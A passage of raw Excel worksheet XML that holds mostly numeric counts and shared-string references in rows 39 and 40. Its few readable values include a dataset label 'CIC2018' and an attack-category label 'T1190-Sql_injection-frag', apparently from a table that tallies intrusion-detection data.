      <c r="KB39" s="113">
        <v>0</v>
      </c>
      <c r="KC39" s="114">
        <v>0</v>
      </c>
      <c r="KD39" s="503">
        <v>0</v>
      </c>
      <c r="KE39" s="115">
        <v>0</v>
      </c>
      <c r="KF39" s="115">
        <v>0</v>
      </c>
      <c r="KG39" s="116">
        <v>0</v>
      </c>
      <c r="KH39" s="250">
        <v>0</v>
      </c>
      <c r="KI39" s="251">
        <v>0</v>
      </c>
      <c r="KJ39" s="505">
        <v>0</v>
      </c>
      <c r="KK39" s="252">
        <v>0</v>
      </c>
      <c r="KL39" s="252">
        <v>0</v>
      </c>
      <c r="KM39" s="253">
        <v>0</v>
      </c>
      <c r="KN39" s="101">
        <v>0</v>
      </c>
      <c r="KO39" s="102">
        <v>0</v>
      </c>
      <c r="KP39" s="102">
        <v>0</v>
      </c>
      <c r="KQ39" s="103">
        <v>0</v>
      </c>
      <c r="KR39" s="103">
        <v>0</v>
      </c>
      <c r="KS39" s="104">
        <v>0</v>
      </c>
      <c r="KT39" s="105">
        <v>0</v>
      </c>
      <c r="KU39" s="106">
        <v>0</v>
      </c>
      <c r="KV39" s="497">
        <v>0</v>
      </c>
      <c r="KW39" s="107">
        <v>0</v>
      </c>
      <c r="KX39" s="107">
        <v>0</v>
      </c>
      <c r="KY39" s="108">
        <v>0</v>
      </c>
      <c r="KZ39" s="109">
        <v>0</v>
      </c>
      <c r="LA39" s="110">
        <v>0</v>
      </c>
      <c r="LB39" s="501">
        <v>0</v>
      </c>
      <c r="LC39" s="111">
        <v>0</v>
      </c>
      <c r="LD39" s="111">
        <v>0</v>
      </c>
      <c r="LE39" s="112">
        <v>0</v>
      </c>
      <c r="LF39" s="113">
        <v>0</v>
      </c>
      <c r="LG39" s="114">
        <v>0</v>
      </c>
      <c r="LH39" s="503">
        <v>0</v>
      </c>
      <c r="LI39" s="115">
        <v>0</v>
      </c>
      <c r="LJ39" s="115">
        <v>0</v>
      </c>
      <c r="LK39" s="116">
        <v>0</v>
      </c>
      <c r="LL39" s="117">
        <v>2</v>
      </c>
      <c r="LM39" s="507">
        <v>2</v>
      </c>
      <c r="LN39" s="119">
        <v>0</v>
      </c>
      <c r="LO39" s="119">
        <v>2</v>
      </c>
      <c r="LP39" s="119">
        <v>1</v>
      </c>
      <c r="LQ39" s="119">
        <v>0</v>
      </c>
      <c r="LR39" s="119">
        <v>1</v>
      </c>
      <c r="LS39" s="119">
        <v>1</v>
      </c>
      <c r="LT39" s="382"/>
      <c r="LU39" s="117">
        <v>0</v>
      </c>
      <c r="LV39" s="118">
        <v>0</v>
      </c>
      <c r="LW39" s="507">
        <v>0</v>
      </c>
      <c r="LX39" s="119">
        <v>0</v>
      </c>
      <c r="LY39" s="119">
        <v>0</v>
      </c>
      <c r="LZ39" s="119">
        <v>0</v>
      </c>
      <c r="MA39" s="117">
        <v>0</v>
      </c>
      <c r="MB39" s="118">
        <v>0</v>
      </c>
      <c r="MC39" s="507">
        <v>0</v>
      </c>
      <c r="MD39" s="119">
        <v>0</v>
      </c>
      <c r="ME39" s="119">
        <v>0</v>
      </c>
      <c r="MF39" s="119">
        <v>0</v>
      </c>
      <c r="MG39" s="117">
        <v>0</v>
      </c>
      <c r="MH39" s="118">
        <v>0</v>
      </c>
      <c r="MI39" s="507">
        <v>0</v>
      </c>
      <c r="MJ39" s="119">
        <v>0</v>
      </c>
      <c r="MK39" s="119">
        <v>0</v>
      </c>
      <c r="ML39" s="119">
        <v>0</v>
      </c>
      <c r="MM39" s="117">
        <v>0</v>
      </c>
      <c r="MN39" s="118">
        <v>0</v>
      </c>
      <c r="MO39" s="507">
        <v>0</v>
      </c>
      <c r="MP39" s="119">
        <v>0</v>
      </c>
      <c r="MQ39" s="119">
        <v>0</v>
      </c>
      <c r="MR39" s="119">
        <v>0</v>
      </c>
      <c r="MS39" s="117">
        <v>0</v>
      </c>
      <c r="MT39" s="118">
        <v>0</v>
      </c>
      <c r="MU39" s="507">
        <v>0</v>
      </c>
      <c r="MV39" s="119">
        <v>0</v>
      </c>
      <c r="MW39" s="119">
        <v>0</v>
      </c>
      <c r="MX39" s="119">
        <v>0</v>
      </c>
      <c r="MY39" s="117">
        <v>0</v>
      </c>
      <c r="MZ39" s="118">
        <v>0</v>
      </c>
      <c r="NA39" s="507">
        <v>0</v>
      </c>
      <c r="NB39" s="119">
        <v>0</v>
      </c>
      <c r="NC39" s="119">
        <v>0</v>
      </c>
      <c r="ND39" s="119">
        <v>0</v>
      </c>
      <c r="NE39" s="117">
        <v>0</v>
      </c>
      <c r="NF39" s="118">
        <v>0</v>
      </c>
      <c r="NG39" s="507">
        <v>0</v>
      </c>
      <c r="NH39" s="119">
        <v>0</v>
      </c>
      <c r="NI39" s="119">
        <v>0</v>
      </c>
      <c r="NJ39" s="119">
        <v>0</v>
      </c>
      <c r="NK39" s="117">
        <v>1</v>
      </c>
      <c r="NL39" s="118" t="s">
        <v>4167</v>
      </c>
      <c r="NM39" s="507">
        <v>1</v>
      </c>
      <c r="NN39" s="119" t="s">
        <v>2638</v>
      </c>
      <c r="NO39" s="119">
        <v>1</v>
      </c>
      <c r="NP39" s="119">
        <v>1</v>
      </c>
      <c r="NQ39" s="117">
        <v>0</v>
      </c>
      <c r="NR39" s="118">
        <v>0</v>
      </c>
      <c r="NS39" s="507">
        <v>0</v>
      </c>
      <c r="NT39" s="119">
        <v>0</v>
      </c>
      <c r="NU39" s="119">
        <v>0</v>
      </c>
      <c r="NV39" s="119">
        <v>0</v>
      </c>
      <c r="NW39" s="117">
        <v>1</v>
      </c>
      <c r="NX39" s="118" t="s">
        <v>4356</v>
      </c>
      <c r="NY39" s="507">
        <v>1</v>
      </c>
      <c r="NZ39" s="119" t="s">
        <v>3119</v>
      </c>
      <c r="OA39" s="119">
        <v>1</v>
      </c>
      <c r="OB39" s="119">
        <v>1</v>
      </c>
      <c r="OC39" s="120">
        <v>4</v>
      </c>
      <c r="OD39" s="120">
        <v>2</v>
      </c>
      <c r="OE39" s="120">
        <v>2</v>
      </c>
      <c r="OF39" s="121">
        <v>1</v>
      </c>
      <c r="OG39" s="120">
        <v>1</v>
      </c>
      <c r="OH39" s="120">
        <v>1</v>
      </c>
      <c r="OI39" s="120">
        <v>1</v>
      </c>
      <c r="OJ39" s="120">
        <v>1</v>
      </c>
      <c r="OK39" s="383"/>
      <c r="OL39" s="120">
        <v>4</v>
      </c>
      <c r="OM39" s="120">
        <v>4</v>
      </c>
      <c r="ON39" s="120">
        <v>2</v>
      </c>
      <c r="OO39" s="120" t="s">
        <v>3081</v>
      </c>
      <c r="OP39" s="120">
        <v>2</v>
      </c>
      <c r="OQ39" s="464">
        <v>1</v>
      </c>
      <c r="OR39" s="120">
        <v>0</v>
      </c>
      <c r="OS39" s="120">
        <v>0</v>
      </c>
      <c r="OT39" s="120">
        <v>0</v>
      </c>
      <c r="OU39" s="120"/>
      <c r="OV39" s="120">
        <v>0</v>
      </c>
      <c r="OW39" s="464">
        <v>0</v>
      </c>
      <c r="OX39" s="120">
        <v>0</v>
      </c>
      <c r="OY39" s="120">
        <v>0</v>
      </c>
      <c r="OZ39" s="120">
        <v>0</v>
      </c>
      <c r="PA39" s="120"/>
      <c r="PB39" s="120">
        <v>0</v>
      </c>
      <c r="PC39" s="464">
        <v>0</v>
      </c>
      <c r="PD39" s="120">
        <v>0</v>
      </c>
      <c r="PE39" s="120">
        <v>0</v>
      </c>
      <c r="PF39" s="120">
        <v>0</v>
      </c>
      <c r="PG39" s="120"/>
      <c r="PH39" s="120">
        <v>0</v>
      </c>
      <c r="PI39" s="464">
        <v>0</v>
      </c>
      <c r="PJ39" s="120">
        <v>0</v>
      </c>
      <c r="PK39" s="120">
        <v>0</v>
      </c>
      <c r="PL39" s="120">
        <v>0</v>
      </c>
      <c r="PM39" s="120"/>
      <c r="PN39" s="120">
        <v>0</v>
      </c>
      <c r="PO39" s="464">
        <v>0</v>
      </c>
      <c r="PP39" s="120">
        <v>0</v>
      </c>
      <c r="PQ39" s="120">
        <v>0</v>
      </c>
      <c r="PR39" s="120">
        <v>0</v>
      </c>
      <c r="PS39" s="120"/>
      <c r="PT39" s="120">
        <v>0</v>
      </c>
      <c r="PU39" s="464">
        <v>0</v>
      </c>
      <c r="PV39" s="120">
        <v>0</v>
      </c>
      <c r="PW39" s="120">
        <v>0</v>
      </c>
      <c r="PX39" s="120">
        <v>0</v>
      </c>
      <c r="PY39" s="120"/>
      <c r="PZ39" s="120">
        <v>0</v>
      </c>
      <c r="QA39" s="464">
        <v>0</v>
      </c>
      <c r="QB39" s="120">
        <v>0</v>
      </c>
      <c r="QC39" s="120">
        <v>0</v>
      </c>
      <c r="QD39" s="120">
        <v>0</v>
      </c>
      <c r="QE39" s="120"/>
      <c r="QF39" s="120">
        <v>0</v>
      </c>
      <c r="QG39" s="464">
        <v>0</v>
      </c>
      <c r="QH39" s="120">
        <v>4</v>
      </c>
      <c r="QI39" s="120">
        <v>4</v>
      </c>
      <c r="QJ39" s="120">
        <v>1</v>
      </c>
      <c r="QK39" s="120" t="s">
        <v>2542</v>
      </c>
      <c r="QL39" s="120">
        <v>1</v>
      </c>
      <c r="QM39" s="464">
        <v>1</v>
      </c>
      <c r="QN39" s="120">
        <v>0</v>
      </c>
      <c r="QO39" s="120">
        <v>0</v>
      </c>
      <c r="QP39" s="120">
        <v>0</v>
      </c>
      <c r="QQ39" s="120"/>
      <c r="QR39" s="120">
        <v>0</v>
      </c>
      <c r="QS39" s="464">
        <v>0</v>
      </c>
      <c r="QT39" s="184"/>
      <c r="QU39" s="184"/>
      <c r="QV39" s="184"/>
      <c r="QW39" s="184"/>
      <c r="QX39" s="184"/>
      <c r="QY39" s="184"/>
      <c r="QZ39" s="184"/>
      <c r="RA39" s="184"/>
      <c r="RB39" s="184"/>
      <c r="RC39" s="184"/>
      <c r="RD39" s="184"/>
      <c r="RE39" s="184"/>
      <c r="RF39" s="184"/>
      <c r="RG39" s="184"/>
      <c r="RH39" s="184"/>
      <c r="RI39" s="184"/>
      <c r="RJ39" s="184"/>
      <c r="RK39" s="184"/>
      <c r="RL39" s="184"/>
      <c r="RM39" s="184"/>
      <c r="RN39" s="184"/>
      <c r="RO39" s="184"/>
      <c r="RP39" s="184"/>
      <c r="RQ39" s="184"/>
      <c r="RR39" s="184"/>
      <c r="RS39" s="184"/>
      <c r="RT39" s="184"/>
      <c r="RU39" s="184"/>
      <c r="RV39" s="184"/>
      <c r="RW39" s="184"/>
      <c r="RX39" s="184"/>
      <c r="RY39" s="184"/>
      <c r="RZ39" s="184"/>
      <c r="SA39" s="184"/>
      <c r="SB39" s="184"/>
      <c r="SC39" s="184"/>
      <c r="SD39" s="184"/>
      <c r="SE39" s="184"/>
      <c r="SF39" s="184"/>
      <c r="SG39" s="184"/>
      <c r="SH39" s="184"/>
      <c r="SI39" s="184"/>
      <c r="SJ39" s="184"/>
      <c r="SK39" s="184"/>
      <c r="SL39" s="184"/>
      <c r="SM39" s="184"/>
      <c r="SN39" s="184"/>
      <c r="SO39" s="184"/>
      <c r="SP39" s="184"/>
      <c r="SQ39" s="184"/>
      <c r="SR39" s="184"/>
      <c r="SS39" s="184"/>
      <c r="ST39" s="184"/>
      <c r="SU39" s="184"/>
      <c r="SV39" s="184"/>
      <c r="SW39" s="184"/>
      <c r="SX39" s="184"/>
      <c r="SY39" s="184"/>
      <c r="SZ39" s="184"/>
      <c r="TA39" s="184"/>
      <c r="TB39" s="184"/>
      <c r="TC39" s="184"/>
      <c r="TD39" s="184"/>
      <c r="TE39" s="184"/>
      <c r="TF39" s="184"/>
      <c r="TG39" s="184"/>
      <c r="TH39" s="184"/>
      <c r="TI39" s="184"/>
      <c r="TJ39" s="184"/>
      <c r="TK39" s="184"/>
      <c r="TL39" s="184"/>
      <c r="TM39" s="184"/>
      <c r="TN39" s="184"/>
      <c r="TO39" s="184"/>
      <c r="TP39" s="184"/>
      <c r="TQ39" s="184"/>
      <c r="TR39" s="184"/>
      <c r="TS39" s="184"/>
      <c r="TT39" s="184"/>
      <c r="TU39" s="184"/>
      <c r="TV39" s="184"/>
      <c r="TW39" s="184"/>
      <c r="TX39" s="184"/>
      <c r="TY39" s="184"/>
      <c r="TZ39" s="184"/>
      <c r="UA39" s="184"/>
      <c r="UB39" s="184"/>
      <c r="UC39" s="184"/>
      <c r="UD39" s="184"/>
      <c r="UE39" s="184"/>
      <c r="UF39" s="184"/>
      <c r="UG39" s="184"/>
      <c r="UH39" s="184"/>
      <c r="UI39" s="184"/>
      <c r="UJ39" s="184"/>
      <c r="UK39" s="184"/>
      <c r="UL39" s="184"/>
      <c r="UM39" s="184"/>
      <c r="UN39" s="184"/>
      <c r="UO39" s="184"/>
      <c r="UP39" s="184"/>
      <c r="UQ39" s="184"/>
      <c r="UR39" s="184"/>
      <c r="US39" s="184"/>
      <c r="UT39" s="184"/>
      <c r="UU39" s="184"/>
      <c r="UV39" s="184"/>
      <c r="UW39" s="184"/>
      <c r="UX39" s="184"/>
      <c r="UY39" s="184"/>
      <c r="UZ39" s="184"/>
      <c r="VA39" s="184"/>
      <c r="VB39" s="184"/>
      <c r="VC39" s="184"/>
      <c r="VD39" s="184"/>
      <c r="VE39" s="184"/>
      <c r="VF39" s="184"/>
      <c r="VG39" s="184"/>
      <c r="VH39" s="184"/>
      <c r="VI39" s="184"/>
      <c r="VJ39" s="184"/>
      <c r="VK39" s="184"/>
      <c r="VL39" s="184"/>
      <c r="VM39" s="184"/>
      <c r="VN39" s="184"/>
      <c r="VO39" s="184"/>
      <c r="VP39" s="184"/>
      <c r="VQ39" s="184"/>
      <c r="VR39" s="184"/>
      <c r="VS39" s="184"/>
      <c r="VT39" s="184"/>
      <c r="VU39" s="184"/>
      <c r="VV39" s="184"/>
      <c r="VW39" s="184"/>
      <c r="VX39" s="184"/>
      <c r="VY39" s="184"/>
    </row>
    <row r="40" spans="1:597" ht="39.950000000000003" customHeight="1">
      <c r="A40" s="82" t="s">
        <v>72</v>
      </c>
      <c r="B40" s="83" t="s">
        <v>4</v>
      </c>
      <c r="C40" s="83" t="s">
        <v>437</v>
      </c>
      <c r="D40" s="83" t="s">
        <v>80</v>
      </c>
      <c r="E40" s="83">
        <f t="shared" si="2"/>
        <v>32</v>
      </c>
      <c r="F40" s="83" t="s">
        <v>81</v>
      </c>
      <c r="G40" s="83" t="s">
        <v>4</v>
      </c>
      <c r="H40" s="83" t="s">
        <v>4</v>
      </c>
      <c r="I40" s="81" t="s">
        <v>1115</v>
      </c>
      <c r="J40" s="85" t="s">
        <v>827</v>
      </c>
      <c r="K40" s="81" t="s">
        <v>1116</v>
      </c>
      <c r="L40" s="81" t="s">
        <v>1117</v>
      </c>
      <c r="M40" s="378" t="s">
        <v>1763</v>
      </c>
      <c r="N40" s="74" t="str">
        <f t="shared" si="0"/>
        <v>OK</v>
      </c>
      <c r="O40" s="485" t="str">
        <f t="shared" si="1"/>
        <v>CIC2018</v>
      </c>
      <c r="P40" s="91"/>
      <c r="Q40" s="379" t="s">
        <v>745</v>
      </c>
      <c r="R40" s="92" t="s">
        <v>1118</v>
      </c>
      <c r="S40" s="93" t="s">
        <v>749</v>
      </c>
      <c r="T40" s="92" t="s">
        <v>1119</v>
      </c>
      <c r="U40" s="94" t="s">
        <v>4</v>
      </c>
      <c r="V40" s="95" t="s">
        <v>751</v>
      </c>
      <c r="W40" s="96" t="s">
        <v>1120</v>
      </c>
      <c r="X40" s="97" t="s">
        <v>886</v>
      </c>
      <c r="Y40" s="83" t="s">
        <v>1121</v>
      </c>
      <c r="Z40" s="98" t="s">
        <v>886</v>
      </c>
      <c r="AA40" s="182" t="s">
        <v>745</v>
      </c>
      <c r="AB40" s="183" t="s">
        <v>745</v>
      </c>
      <c r="AC40" s="302" t="s">
        <v>745</v>
      </c>
      <c r="AD40" s="83"/>
      <c r="AE40" s="83"/>
      <c r="AF40" s="384" t="s">
        <v>4</v>
      </c>
      <c r="AG40" s="88" t="s">
        <v>745</v>
      </c>
      <c r="AH40" s="341" t="s">
        <v>746</v>
      </c>
      <c r="AI40" s="353" t="s">
        <v>756</v>
      </c>
      <c r="AJ40" s="353" t="s">
        <v>747</v>
      </c>
      <c r="AK40" s="354" t="s">
        <v>745</v>
      </c>
      <c r="AL40" s="355" t="s">
        <v>747</v>
      </c>
      <c r="AM40" s="355" t="s">
        <v>756</v>
      </c>
      <c r="AN40" s="355" t="s">
        <v>756</v>
      </c>
      <c r="AO40" s="359" t="s">
        <v>756</v>
      </c>
      <c r="AP40" s="385" t="str">
        <f>M40&amp;"-frag"</f>
        <v>T1190-Sql_injection-frag</v>
      </c>
      <c r="AQ40" s="358">
        <v>77</v>
      </c>
      <c r="AR40" s="100"/>
      <c r="AS40" s="100">
        <v>76</v>
      </c>
      <c r="AT40" s="100">
        <v>0</v>
      </c>
      <c r="AU40" s="100">
        <v>76</v>
      </c>
      <c r="AV40" s="92" t="s">
        <v>4</v>
      </c>
      <c r="AW40" s="100">
        <v>76</v>
      </c>
      <c r="AX40" s="100">
        <v>76</v>
      </c>
      <c r="AY40" s="100">
        <v>0</v>
      </c>
      <c r="AZ40" s="100">
        <v>76</v>
      </c>
      <c r="BA40" s="381" t="s">
        <v>2480</v>
      </c>
      <c r="BB40" s="101">
        <v>38</v>
      </c>
      <c r="BC40" s="102" t="s">
        <v>3093</v>
      </c>
      <c r="BD40" s="102">
        <v>36</v>
      </c>
      <c r="BE40" s="103" t="s">
        <v>3094</v>
      </c>
      <c r="BF40" s="103">
        <v>2</v>
      </c>
      <c r="BG40" s="104">
        <v>36</v>
      </c>
      <c r="BH40" s="105">
        <v>68</v>
      </c>
      <c r="BI40" s="106" t="s">
        <v>3095</v>
      </c>
      <c r="BJ40" s="497">
        <v>66</v>
      </c>
      <c r="BK40" s="107" t="s">
        <v>3096</v>
      </c>
      <c r="BL40" s="107">
        <v>7</v>
      </c>
      <c r="BM40" s="108">
        <v>30</v>
      </c>
      <c r="BN40" s="109">
        <v>106</v>
      </c>
      <c r="BO40" s="110" t="s">
        <v>2006</v>
      </c>
      <c r="BP40" s="501">
        <v>102</v>
      </c>
      <c r="BQ40" s="111" t="s">
        <v>2007</v>
      </c>
      <c r="BR40" s="111">
        <v>9</v>
      </c>
      <c r="BS40" s="112">
        <v>38</v>
      </c>
      <c r="BT40" s="113">
        <v>124</v>
      </c>
      <c r="BU40" s="114" t="s">
        <v>3097</v>
      </c>
      <c r="BV40" s="503">
        <v>114</v>
      </c>
      <c r="BW40" s="115" t="s">
        <v>3098</v>
      </c>
      <c r="BX40" s="115">
        <v>6</v>
      </c>
      <c r="BY40" s="116">
        <v>44</v>
      </c>
      <c r="BZ40" s="250">
        <v>74</v>
      </c>
      <c r="CA40" s="251" t="s">
        <v>4474</v>
      </c>
      <c r="CB40" s="505">
        <v>72</v>
      </c>
      <c r="CC40" s="252" t="s">
        <v>4475</v>
      </c>
      <c r="CD40" s="252">
        <v>10</v>
      </c>
      <c r="CE40" s="253">
        <v>32</v>
      </c>
      <c r="CF40" s="101">
        <v>164</v>
      </c>
      <c r="CG40" s="102" t="s">
        <v>3099</v>
      </c>
      <c r="CH40" s="102">
        <v>153</v>
      </c>
      <c r="CI40" s="103" t="s">
        <v>3100</v>
      </c>
      <c r="CJ40" s="103">
        <v>14</v>
      </c>
      <c r="CK40" s="104">
        <v>44</v>
      </c>
      <c r="CL40" s="105">
        <v>0</v>
      </c>
      <c r="CM40" s="106">
        <v>0</v>
      </c>
      <c r="CN40" s="497">
        <v>0</v>
      </c>
      <c r="CO40" s="107">
        <v>0</v>
      </c>
      <c r="CP40" s="107">
        <v>0</v>
      </c>
      <c r="CQ40" s="108">
        <v>0</v>
      </c>
      <c r="CR40" s="109">
        <v>0</v>
      </c>
      <c r="CS40" s="110">
        <v>0</v>
      </c>
      <c r="CT40" s="501">
        <v>0</v>
      </c>
      <c r="CU40" s="111">
        <v>0</v>
      </c>
      <c r="CV40" s="111">
        <v>0</v>
      </c>
      <c r="CW40" s="112">
        <v>0</v>
      </c>
      <c r="CX40" s="113">
        <v>106</v>
      </c>
      <c r="CY40" s="114" t="s">
        <v>2006</v>
      </c>
      <c r="CZ40" s="503">
        <v>102</v>
      </c>
      <c r="DA40" s="115" t="s">
        <v>2007</v>
      </c>
      <c r="DB40" s="115">
        <v>9</v>
      </c>
      <c r="DC40" s="116">
        <v>38</v>
      </c>
      <c r="DD40" s="101">
        <v>38</v>
      </c>
      <c r="DE40" s="102" t="s">
        <v>3093</v>
      </c>
      <c r="DF40" s="102">
        <v>36</v>
      </c>
      <c r="DG40" s="103" t="s">
        <v>3094</v>
      </c>
      <c r="DH40" s="103">
        <v>2</v>
      </c>
      <c r="DI40" s="104">
        <v>36</v>
      </c>
      <c r="DJ40" s="105">
        <v>64</v>
      </c>
      <c r="DK40" s="106" t="s">
        <v>3101</v>
      </c>
      <c r="DL40" s="497">
        <v>62</v>
      </c>
      <c r="DM40" s="107" t="s">
        <v>3102</v>
      </c>
      <c r="DN40" s="107">
        <v>6</v>
      </c>
      <c r="DO40" s="108">
        <v>28</v>
      </c>
      <c r="DP40" s="109">
        <v>102</v>
      </c>
      <c r="DQ40" s="110" t="s">
        <v>3103</v>
      </c>
      <c r="DR40" s="501">
        <v>98</v>
      </c>
      <c r="DS40" s="111" t="s">
        <v>3104</v>
      </c>
      <c r="DT40" s="111">
        <v>8</v>
      </c>
      <c r="DU40" s="112">
        <v>36</v>
      </c>
      <c r="DV40" s="113">
        <v>95</v>
      </c>
      <c r="DW40" s="114" t="s">
        <v>3105</v>
      </c>
      <c r="DX40" s="503">
        <v>86</v>
      </c>
      <c r="DY40" s="115" t="s">
        <v>3106</v>
      </c>
      <c r="DZ40" s="115">
        <v>5</v>
      </c>
      <c r="EA40" s="116">
        <v>44</v>
      </c>
      <c r="EB40" s="250">
        <v>66</v>
      </c>
      <c r="EC40" s="251" t="s">
        <v>4476</v>
      </c>
      <c r="ED40" s="505">
        <v>64</v>
      </c>
      <c r="EE40" s="252" t="s">
        <v>4477</v>
      </c>
      <c r="EF40" s="252">
        <v>8</v>
      </c>
      <c r="EG40" s="253">
        <v>30</v>
      </c>
      <c r="EH40" s="101">
        <v>127</v>
      </c>
      <c r="EI40" s="102" t="s">
        <v>3107</v>
      </c>
      <c r="EJ40" s="102">
        <v>117</v>
      </c>
      <c r="EK40" s="103" t="s">
        <v>3108</v>
      </c>
      <c r="EL40" s="103">
        <v>11</v>
      </c>
      <c r="EM40" s="104">
        <v>44</v>
      </c>
      <c r="EN40" s="105">
        <v>0</v>
      </c>
      <c r="EO40" s="106">
        <v>0</v>
      </c>
      <c r="EP40" s="497">
        <v>0</v>
      </c>
      <c r="EQ40" s="107">
        <v>0</v>
      </c>
      <c r="ER40" s="107">
        <v>0</v>
      </c>
      <c r="ES40" s="108">
        <v>0</v>
      </c>
      <c r="ET40" s="109">
        <v>0</v>
      </c>
      <c r="EU40" s="110">
        <v>0</v>
      </c>
      <c r="EV40" s="501">
        <v>0</v>
      </c>
      <c r="EW40" s="111">
        <v>0</v>
      </c>
      <c r="EX40" s="111">
        <v>0</v>
      </c>
      <c r="EY40" s="112">
        <v>0</v>
      </c>
      <c r="EZ40" s="113">
        <v>102</v>
      </c>
      <c r="FA40" s="114" t="s">
        <v>3103</v>
      </c>
      <c r="FB40" s="503">
        <v>98</v>
      </c>
      <c r="FC40" s="115" t="s">
        <v>3104</v>
      </c>
      <c r="FD40" s="115">
        <v>8</v>
      </c>
      <c r="FE40" s="116">
        <v>36</v>
      </c>
      <c r="FF40" s="101">
        <v>0</v>
      </c>
      <c r="FG40" s="102">
        <v>0</v>
      </c>
      <c r="FH40" s="102">
        <v>0</v>
      </c>
      <c r="FI40" s="103">
        <v>0</v>
      </c>
      <c r="FJ40" s="103">
        <v>0</v>
      </c>
      <c r="FK40" s="104">
        <v>0</v>
      </c>
      <c r="FL40" s="105">
        <v>4</v>
      </c>
      <c r="FM40" s="106" t="s">
        <v>3109</v>
      </c>
      <c r="FN40" s="497">
        <v>4</v>
      </c>
      <c r="FO40" s="107" t="s">
        <v>3110</v>
      </c>
      <c r="FP40" s="107">
        <v>1</v>
      </c>
      <c r="FQ40" s="108">
        <v>4</v>
      </c>
      <c r="FR40" s="109">
        <v>4</v>
      </c>
      <c r="FS40" s="110" t="s">
        <v>3109</v>
      </c>
      <c r="FT40" s="501">
        <v>4</v>
      </c>
      <c r="FU40" s="111" t="s">
        <v>3110</v>
      </c>
      <c r="FV40" s="111">
        <v>1</v>
      </c>
      <c r="FW40" s="112">
        <v>4</v>
      </c>
      <c r="FX40" s="113">
        <v>29</v>
      </c>
      <c r="FY40" s="114" t="s">
        <v>3111</v>
      </c>
      <c r="FZ40" s="503">
        <v>28</v>
      </c>
      <c r="GA40" s="115" t="s">
        <v>3112</v>
      </c>
      <c r="GB40" s="115">
        <v>1</v>
      </c>
      <c r="GC40" s="116">
        <v>28</v>
      </c>
      <c r="GD40" s="250">
        <v>8</v>
      </c>
      <c r="GE40" s="251" t="s">
        <v>3113</v>
      </c>
      <c r="GF40" s="505">
        <v>8</v>
      </c>
      <c r="GG40" s="252" t="s">
        <v>3114</v>
      </c>
      <c r="GH40" s="252">
        <v>2</v>
      </c>
      <c r="GI40" s="253">
        <v>7</v>
      </c>
      <c r="GJ40" s="101">
        <v>37</v>
      </c>
      <c r="GK40" s="102" t="s">
        <v>3115</v>
      </c>
      <c r="GL40" s="102">
        <v>36</v>
      </c>
      <c r="GM40" s="103" t="s">
        <v>3116</v>
      </c>
      <c r="GN40" s="103">
        <v>3</v>
      </c>
      <c r="GO40" s="104">
        <v>31</v>
      </c>
      <c r="GP40" s="105">
        <v>0</v>
      </c>
      <c r="GQ40" s="106">
        <v>0</v>
      </c>
      <c r="GR40" s="497">
        <v>0</v>
      </c>
      <c r="GS40" s="107">
        <v>0</v>
      </c>
      <c r="GT40" s="107">
        <v>0</v>
      </c>
      <c r="GU40" s="108">
        <v>0</v>
      </c>
      <c r="GV40" s="109">
        <v>0</v>
      </c>
      <c r="GW40" s="110">
        <v>0</v>
      </c>
      <c r="GX40" s="501">
        <v>0</v>
      </c>
      <c r="GY40" s="111">
        <v>0</v>
      </c>
      <c r="GZ40" s="111">
        <v>0</v>
      </c>
      <c r="HA40" s="112">
        <v>0</v>
      </c>
      <c r="HB40" s="113">
        <v>4</v>
      </c>
      <c r="HC40" s="114" t="s">
        <v>3109</v>
      </c>
      <c r="HD40" s="503">
        <v>4</v>
      </c>
      <c r="HE40" s="115" t="s">
        <v>3110</v>
      </c>
      <c r="HF40" s="115">
        <v>1</v>
      </c>
      <c r="HG40" s="116">
        <v>4</v>
      </c>
      <c r="HH40" s="101">
        <v>0</v>
      </c>
      <c r="HI40" s="102">
        <v>0</v>
      </c>
      <c r="HJ40" s="102">
        <v>0</v>
      </c>
      <c r="HK40" s="103">
        <v>0</v>
      </c>
      <c r="HL40" s="103">
        <v>0</v>
      </c>
      <c r="HM40" s="104">
        <v>0</v>
      </c>
      <c r="HN40" s="105">
        <v>0</v>
      </c>
      <c r="HO40" s="106">
        <v>0</v>
      </c>
      <c r="HP40" s="497">
        <v>0</v>
      </c>
      <c r="HQ40" s="107">
        <v>0</v>
      </c>
      <c r="HR40" s="107">
        <v>0</v>
      </c>
      <c r="HS40" s="108">
        <v>0</v>
      </c>
      <c r="HT40" s="109">
        <v>0</v>
      </c>
      <c r="HU40" s="110">
        <v>0</v>
      </c>
      <c r="HV40" s="501">
        <v>0</v>
      </c>
      <c r="HW40" s="111">
        <v>0</v>
      </c>
      <c r="HX40" s="111">
        <v>0</v>
      </c>
      <c r="HY40" s="112">
        <v>0</v>
      </c>
      <c r="HZ40" s="113">
        <v>0</v>
      </c>
      <c r="IA40" s="114">
        <v>0</v>
      </c>
      <c r="IB40" s="503">
        <v>0</v>
      </c>
      <c r="IC40" s="115">
        <v>0</v>
      </c>
      <c r="ID40" s="115">
        <v>0</v>
      </c>
      <c r="IE40" s="116">
        <v>0</v>
      </c>
      <c r="IF40" s="250">
        <v>0</v>
      </c>
      <c r="IG40" s="251">
        <v>0</v>
      </c>
      <c r="IH40" s="505">
        <v>0</v>
      </c>
      <c r="II40" s="252">
        <v>0</v>
      </c>
      <c r="IJ40" s="252">
        <v>0</v>
      </c>
      <c r="IK40" s="253">
        <v>0</v>
      </c>
      <c r="IL40" s="101">
        <v>0</v>
      </c>
      <c r="IM40" s="102">
        <v>0</v>
      </c>
      <c r="IN40" s="102">
        <v>0</v>
      </c>
      <c r="IO40" s="103">
        <v>0</v>
      </c>
      <c r="IP40" s="103">
        <v>0</v>
      </c>
      <c r="IQ40" s="104">
        <v>0</v>
      </c>
      <c r="IR40" s="105">
        <v>0</v>
      </c>
      <c r="IS40" s="106">
        <v>0</v>
      </c>
      <c r="IT40" s="497">
        <v>0</v>
      </c>
      <c r="IU40" s="107">
        <v>0</v>
      </c>
      <c r="IV40" s="107">
        <v>0</v>
      </c>
      <c r="IW40" s="108">
        <v>0</v>
      </c>
      <c r="IX40" s="109">
        <v>0</v>
      </c>
      <c r="IY40" s="110">
        <v>0</v>
      </c>
      <c r="IZ40" s="501">
        <v>0</v>
      </c>
      <c r="JA40" s="111">
        <v>0</v>
      </c>
      <c r="JB40" s="111">
        <v>0</v>
      </c>
      <c r="JC40" s="112">
        <v>0</v>
      </c>
      <c r="JD40" s="113">
        <v>0</v>
      </c>
      <c r="JE40" s="114">
        <v>0</v>
      </c>
      <c r="JF40" s="503">
        <v>0</v>
      </c>
      <c r="JG40" s="115">
        <v>0</v>
      </c>
      <c r="JH40" s="115">
        <v>0</v>
      </c>
      <c r="JI40" s="116">
        <v>0</v>
      </c>
      <c r="JJ40" s="101">
        <v>0</v>
      </c>
